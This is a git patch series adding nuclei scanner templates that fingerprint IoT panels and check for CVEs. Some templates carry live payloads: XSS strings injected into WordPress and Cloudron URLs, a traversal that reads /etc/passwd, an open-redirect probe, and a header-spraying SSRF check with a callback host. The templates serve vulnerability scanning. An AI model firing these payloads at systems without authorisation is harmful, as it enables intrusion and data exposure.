From 9d6dab87a8b66f1c3239d8274296224f15b72912 Mon Sep 17 00:00:00 2001 From: Jackson Rolf Date: Fri, 10 Sep 2021 11:38:38 -0400 Subject: [PATCH 01/67] test --- text.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 text.txt diff --git a/text.txt b/text.txt new file mode 100644 index 0000000000..e69de29bb2 From 8fe56e7173d67805f86c16cc44145538abafead2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 13:40:39 +0530 Subject: [PATCH 02/67] Create automation-direct.yaml --- iot/automation-direct.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/automation-direct.yaml diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml new file mode 100644 index 0000000000..50a972a06e --- /dev/null +++ b/iot/automation-direct.yaml @@ -0,0 +1,25 @@ +id: automation-direct + +info: + name: Automation Direct + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7295 + tags: panel,iot + metadata: + shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect" + +requests: + - method: GET + path: + - '{{BaseURL}}/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - "C-more -- the best HMI presented by AutomationDirect" + + - type: status + status: + - 200 From 2600bdf23eb0489bdf80c97324af3a3291d4e350 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:05:09 +0530 Subject: [PATCH 03/67] Create tileserver-gl.yaml --- technologies/tileserver-gl.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/tileserver-gl.yaml diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml new file mode 100644 index 0000000000..ce82ed0f7a --- /dev/null +++ b/technologies/tileserver-gl.yaml @@ -0,0 +1,25 @@ +id: tileserver-gl + +info: + name: TileServer GL + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7296 + tags: tech + metadata: + shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "TileServer GL - Server for vector and raster maps with GL styles" + + - type: status + status: + - 200 From 423bd1281720952399b9a0de04d5aa9f93dfe16a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:14:48 +0530 Subject: [PATCH 04/67] Create netsurveillance-web.yaml --- iot/netsurveillance-web.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/netsurveillance-web.yaml diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml new file mode 100644 index 0000000000..914688bcdd --- /dev/null +++ b/iot/netsurveillance-web.yaml @@ -0,0 +1,25 @@ +id: netsurveillance-web + +info: + name: NETSurveillance WEB + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7288 + tags: tech + metadata: + shodan-dork: http.title:"NETSurveillance WEB" + +requests: + - method: GET + path: + - '{{BaseURL}}/Login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - "NetSuveillanceWebCookie" + + - type: status + status: + - 200 From af09692c338383d6375bc68ebe513e156dae9cd3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:18:27 +0530 Subject: [PATCH 05/67] Create new-web-server.yaml --- technologies/new-web-server.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/new-web-server.yaml diff --git a/technologies/new-web-server.yaml b/technologies/new-web-server.yaml new file mode 100644 index 0000000000..d1060d287d --- /dev/null +++ b/technologies/new-web-server.yaml @@ -0,0 +1,25 @@ +id: new-web-server + +info: + name: Web Server Detection + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7291 + tags: tech + metadata: + shodan-dork: html:"Your new web server is ready to use." + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Your new web server is ready to use." + + - type: status + status: + - 200 From d91b9882a64844afd0e46e63b3094960524f05ef Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:22:30 +0530 Subject: [PATCH 06/67] Create amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/amcrest-login.yaml diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml new file mode 100644 index 0000000000..ad2f5a07fd --- /dev/null +++ b/exposed-panels/amcrest-login.yaml @@ -0,0 +1,26 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7273 + tags: tech + metadata: + shodan-dork: html:"amcrest" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "amcrest" + - "LDAP User" + + - type: status + status: + - 200 From f300a7371d3b28819ad1c58db38b93b290307957 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:25:40 +0530 Subject: [PATCH 07/67] Update amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index ad2f5a07fd..de26517ac4 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7273 - tags: tech + tags: panel metadata: shodan-dork: html:"amcrest" From c83f83bc315b732da7e8ce74893396e19ce27c7a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:25:58 +0530 Subject: [PATCH 08/67] Create intelbras-login.yaml --- exposed-panels/intelbras-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/intelbras-login.yaml diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml new file mode 100644 index 0000000000..21942ef9d4 --- /dev/null +++ b/exposed-panels/intelbras-login.yaml @@ -0,0 +1,25 @@ +id: intelbras-login + +info: + name: Intelbras Login + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7272 + tags: panel + metadata: + shodan-dork: http.title:"Intelbras" + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - "Intelbras" + + - type: status + status: + - 200 From dc3ee1128e9a978fa7c7f4c9643cd69d29629096 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 26 Sep 2021 16:36:42 +0530 Subject: [PATCH 09/67] Update amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index de26517ac4..c481ebd0b3 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7273 - tags: panel metadata: shodan-dork: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera requests: - method: GET @@ -18,8 +19,9 @@ requests: matchers: - type: word words: - - "amcrest" - - "LDAP User" + - "Amcrest Technologies" + - "LDAPUser" + condition: and - type: status status: From ac8c9379e9d7f635736eedd8470995549765ba9d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 09:48:07 +0000 Subject: [PATCH 10/67] Auto README Update [Mon Sep 27 09:48:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2a35d58bb3..380e7c1928 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**166 directories, 2125 files**. +**166 directories, 2139 files**. From 08db2a1ebb814aade067dc05df9853d34aa97da7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 15:56:15 +0530 Subject: [PATCH 11/67] Update intelbras-login.yaml --- exposed-panels/intelbras-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml index 21942ef9d4..f3062f3fc1 100644 --- a/exposed-panels/intelbras-login.yaml +++ b/exposed-panels/intelbras-login.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7272 - tags: panel metadata: shodan-dork: http.title:"Intelbras" + google-dork: intitle:"Intelbras" "All Rights Reserved" -.com + tags: panel requests: - method: GET From fb776417b54e835dbeb939ef52b7bcfab4dc89b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 10:27:40 +0000 Subject: [PATCH 12/67] Auto Generated CVE annotations [Mon Sep 27 10:27:40 UTC 2021] :robot: --- cves/2021/CVE-2021-38647.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 7fbede7607..ed29c6ae66 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -12,6 +12,10 @@ info: - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-38647 requests: - raw: From 22392b0133db7abc696d32813cd475bce6128285 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:07:06 +0530 Subject: [PATCH 13/67] Update automation-direct.yaml --- iot/automation-direct.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml index 50a972a06e..7e65eca012 100644 --- a/iot/automation-direct.yaml +++ b/iot/automation-direct.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7295 - tags: panel,iot metadata: shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect" + google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect" + tags: panel,iot requests: - method: GET @@ -23,3 +24,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

([A-Za-z. 0-9]+)<\/P>' From 9420729c0fb194b8a22778b1586fca63d035bdfa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:09:36 +0530 Subject: [PATCH 14/67] Update netsurveillance-web.yaml --- iot/netsurveillance-web.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml index 914688bcdd..5f9b318655 100644 --- a/iot/netsurveillance-web.yaml +++ b/iot/netsurveillance-web.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7288 - tags: tech metadata: shodan-dork: http.title:"NETSurveillance WEB" + google-dork: intitle:"NETSurveillance WEB" + tags: tech,iot requests: - method: GET @@ -18,7 +19,7 @@ requests: matchers: - type: word words: - - "NetSuveillanceWebCookie" + - "NetSurveillance WEB" - type: status status: From 40d54d1f3df45a49a50abf8e61c87da7804ecb37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:13:17 +0530 Subject: [PATCH 15/67] Delete new-web-server.yaml --- technologies/new-web-server.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 technologies/new-web-server.yaml diff --git a/technologies/new-web-server.yaml b/technologies/new-web-server.yaml deleted file mode 100644 index d1060d287d..0000000000 --- a/technologies/new-web-server.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: new-web-server - -info: - name: Web Server Detection - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7291 - tags: tech - metadata: - shodan-dork: html:"Your new web server is ready to use." - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Your new web server is ready to use." - - - type: status - status: - - 200 From 1a2c4d709e30fd6608ef59722ed5348be928ea89 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 17:17:24 +0530 Subject: [PATCH 16/67] Update tileserver-gl.yaml --- technologies/tileserver-gl.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml index ce82ed0f7a..934caa93ca 100644 --- a/technologies/tileserver-gl.yaml +++ b/technologies/tileserver-gl.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7296 - tags: tech metadata: shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles" + google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles" + tags: tech requests: - method: GET @@ -23,3 +24,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Powered by TileServer GL \(([a-z- 0-9.]+)\)' From f0dda40b1b6bdbe65504e11e843061a64b0e28b2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 Sep 2021 22:45:53 +0530 Subject: [PATCH 17/67] Create CVE-2021-39320.yaml --- cves/2021/CVE-2021-39320.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-39320.yaml diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml new file mode 100644 index 0000000000..5719b82f47 --- /dev/null +++ b/cves/2021/CVE-2021-39320.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-39320 + +info: + name: underConstruction < 1.19 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 + tags: wordpress,xss,cves,cve2021 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php/">/?page=under-construction' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 6f3678a7e8201dadd177768db7719931f8321306 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 17:17:13 +0000 Subject: [PATCH 18/67] Auto Generated CVE annotations [Mon Sep 27 17:17:13 UTC 2021] :robot: --- cves/2021/CVE-2021-39320.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 5719b82f47..3e5a9c2cc1 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 tags: wordpress,xss,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-39320 + cwe-id: CWE-79 + description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." requests: - method: GET path: From b0ce4b83cf4412eace746d5f214412a395988c5e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 28 Sep 2021 09:31:37 +0900 Subject: [PATCH 19/67] Create wp-church-admin-lfi.yaml --- wp-church-admin-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 wp-church-admin-lfi.yaml diff --git a/wp-church-admin-lfi.yaml b/wp-church-admin-lfi.yaml new file mode 100644 index 0000000000..b97b529ca9 --- /dev/null +++ b/wp-church-admin-lfi.yaml @@ -0,0 +1,24 @@ +id: wp-plugin-church-admin-lfi + +info: + name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi + reference: https://wpscan.com/vulnerability/8997 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3fd4dfacde29fa207d0956a02bd62f545e155d6d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 28 Sep 2021 07:42:28 +0700 Subject: [PATCH 20/67] Create CVE-2021-40868.yaml --- cves/2021/CVE-2021-40868.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-40868.yaml diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml new file mode 100644 index 0000000000..efec85092f --- /dev/null +++ b/cves/2021/CVE-2021-40868.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-40868 + +info: + name: Cloudron 6.2 Cross Site Scripting + author: daffainfo + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. + severity: medium + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 + - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html + tags: cve,cve2021,xss,cloudron + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html?returnTo=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '">' + part: body From 2b635a352e5d93d3c3c6a9bbfef99b80f035e6b6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 27 Sep 2021 20:53:50 -0500 Subject: [PATCH 21/67] Create CVE-2021-3654.yaml --- cves/2021/CVE-2021-3654.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-3654.yaml diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml new file mode 100644 index 0000000000..a39cee30f4 --- /dev/null +++ b/cves/2021/CVE-2021-3654.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-3654 + +info: + name: noVNC Open Redirect + author: geeknik + severity: low + description: A user-controlled input redirects noVNC users to an external website. + tags: redirect,novnc,cve,cve2021 + +requests: + - method: GET + + path: + - '{{BaseURL}}//example.com/%2f..' + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header + + - type: status + status: + - 302 + - 301 From ca7a035303e98f49e3b641d6b15408f992baed16 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 27 Sep 2021 20:58:51 -0500 Subject: [PATCH 22/67] Update CVE-2021-3654.yaml add reference --- cves/2021/CVE-2021-3654.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml index a39cee30f4..3fd9a96620 100644 --- a/cves/2021/CVE-2021-3654.yaml +++ b/cves/2021/CVE-2021-3654.yaml @@ -5,6 +5,9 @@ info: author: geeknik severity: low description: A user-controlled input redirects noVNC users to an external website. + reference: + - https://seclists.org/oss-sec/2021/q3/188 + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654 tags: redirect,novnc,cve,cve2021 requests: From 1a4f6754b44948ec9f10e76806d6849410c48580 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:15:57 +0530 Subject: [PATCH 23/67] Create generic-oob-header-based-interaction.yaml --- .../generic-oob-header-based-interaction.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 vulnerabilities/generic/generic-oob-header-based-interaction.yaml diff --git a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml b/vulnerabilities/generic/generic-oob-header-based-interaction.yaml new file mode 100644 index 0000000000..5a6ad517a0 --- /dev/null +++ b/vulnerabilities/generic/generic-oob-header-based-interaction.yaml @@ -0,0 +1,40 @@ +id: generic-oob-header-based-interaction + +info: + name: Header Based Generic OOB Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed URL from the request headers. + reference: https://github.com/PortSwigger/collaborator-everywhere + tags: oob,ssrf,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}} + Referer: http://{{interactsh-url}}/ref + Cf-Connecting_ip: spoofed.{{interactsh-url}} + X-Real-Ip: spoofed.{{interactsh-url}} + From: root@{{interactsh-url}} + True-Client-Ip: spoofed.{{interactsh-url}} + Client-Ip: spoofed.{{interactsh-url}} + Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}} + X-Client-Ip: spoofed.{{interactsh-url}} + X-Originating-Ip: spoofed.{{interactsh-url}} + X-Wap-Profile: http://{{interactsh-url}}/wap.xml + X-Forwarded-For: spoofed.{{interactsh-url}} + Contact: root@{{interactsh-url}} + X-Forwarded-Host: 'spoofed.{{interactsh-url}}' + X-Host: 'spoofed.{{interactsh-url}}' + X-Forwarded-Server: 'spoofed.{{interactsh-url}}' + X-HTTP-Host-Override: 'spoofed.{{interactsh-url}}' + Cache-Control: no-transform + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From c72e1be129baf4e156f0955a0212fbe736e2b1dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 09:46:34 +0000 Subject: [PATCH 24/67] Auto Generated Templates Stats [Tue Sep 28 09:46:34 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1579 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 803 insertions(+), 798 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 991eabbc05..c0663f1861 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":725},{"name":"lfi","count":260},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":223},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":127},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"misc","count":23},{"name":"cve2015","count":23},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"files","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"kubernetes","count":7},{"name":"confluence","count":7},{"name":"google","count":7},{"name":"django","count":6},{"name":"cve2008","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"jetty","count":6},{"name":"laravel","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"hp","count":5},{"name":"tomcat","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"symfony","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"exchange","count":4},{"name":"symantec","count":4},{"name":"grafana","count":4},{"name":"camera","count":4},{"name":"magmi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"firmware","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"zabbix","count":4},{"name":"wso2","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"tikiwiki","count":3},{"name":"openssh","count":3},{"name":"opensis","count":3},{"name":"npm","count":3},{"name":"slack","count":3},{"name":"terramaster","count":3},{"name":"itop","count":3},{"name":"ofbiz","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"firebase","count":3},{"name":"injection","count":3},{"name":"druid","count":3},{"name":"ssh","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"nexus","count":3},{"name":"openam","count":3},{"name":"httpd","count":3},{"name":"caucho","count":3},{"name":"cacti","count":3},{"name":"zhiyuan","count":3},{"name":"jeesns","count":3},{"name":"waf","count":2},{"name":"minio","count":2},{"name":"db","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"trixbox","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"hasura","count":2},{"name":"enumeration","count":2},{"name":"ilo","count":2},{"name":"natshell","count":2},{"name":"storage","count":2},{"name":"middleware","count":2},{"name":"akamai","count":2},{"name":"ecology","count":2},{"name":"sonarqube","count":2},{"name":"bypass","count":2},{"name":"geowebserver","count":2},{"name":"hpe","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"couchdb","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"splunk","count":2},{"name":"avantfax","count":2},{"name":"dos","count":2},{"name":"icewarp","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"rockmongo","count":2},{"name":"node","count":2},{"name":"huawei","count":2},{"name":"akkadian","count":2},{"name":"qcubed","count":2},{"name":"emerge","count":2},{"name":"maian","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"adminer","count":2},{"name":"odoo","count":2},{"name":"phpcollab","count":2},{"name":"kong","count":2},{"name":"chiyu","count":2},{"name":"service","count":2},{"name":"vrealize","count":2},{"name":"hashicorp","count":2},{"name":"frp","count":2},{"name":"status","count":2},{"name":"ec2","count":2},{"name":"seeyon","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"idrac","count":2},{"name":"voipmonitor","count":2},{"name":"sonicwall","count":2},{"name":"hosthea